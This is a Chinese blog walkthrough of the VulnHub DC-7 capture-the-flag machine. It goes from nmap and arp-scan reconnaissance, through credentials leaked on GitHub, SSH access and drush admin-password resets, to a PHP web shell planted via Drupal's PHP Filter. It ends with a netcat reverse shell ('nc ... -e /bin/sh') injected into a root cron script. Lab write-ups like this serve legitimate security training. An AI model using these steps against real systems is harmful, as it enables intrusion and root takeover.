一:信息收集
1:主机发现
arp-scan -I eth0 10.9.23.0/24
靶机IP
10.9.23.157
2:端口扫描
nmap -A -p- -T4 10.9.23.157
3:端口探测
给的提示去搜索一下
@DC7USER
发现是github的一些代码,下载进行查看
在config.php配置文件里发现了用户名和密码
$username = "dc7user";
$password = "MdR3xOgB7#dW";
尝试右上角的登录界面
登陆失败
二:渗透测试
1:ssh登录
尝试ssh登录
ssh dc7user@10.9.23.157
在产看文件发现存在一个定时任务
cd /opt/scripts/
2:漏洞利用
发现能运行drush命令,drush命令可以更改密码,在/var/www/html目录下运行drush命令,更改admin的密码。
drush常用命令:
$ drush cr 各种清缓存
$ drush pm-enable 安装module
$ drush pm-uninstall 卸载module
$ drush pm-list 显示所有modules and themes列表
$ drush user-password admin --password "123" 更改密码
cd /var/www/html
drush user-password admin --password="root"
然后用更改后的密码登录到系统中:
使用以下命令创建新用户:
drush user-create root --password "root"
drush user-password root --password="root"
新创建的用户没有东西,还是去admin
dc7的CMS是Drupal8,已经移除了PHP Filter(php过滤器),后续作为一个模组存在,可以手动安装。在官网找到下载链接,下载之后给 DC-7 安装
在Content中添加一句话木马,依次点击:content(内容)→add content→basic page(为静态内容使用基本页面),测试添加,命名为ceshi。选择format为php code。
挂一句话木马()
使用蚁剑连接,反弹shell
三:提权
写入反弹shell、交互式shell然后提权,不过前面用drash命令时,发现是定时任务,可以再定时任务中添加用/bin/bash执行的nc命令,然后监听:
nc 10.9.23.112 6666 -e /bin/sh
定时任务需要等待一会
成功拿下
标签:10.9,dc,--,vulnhub,drush,靶机,password,root,admin From: https://www.cnblogs.com/woaishuaidan/p/18072549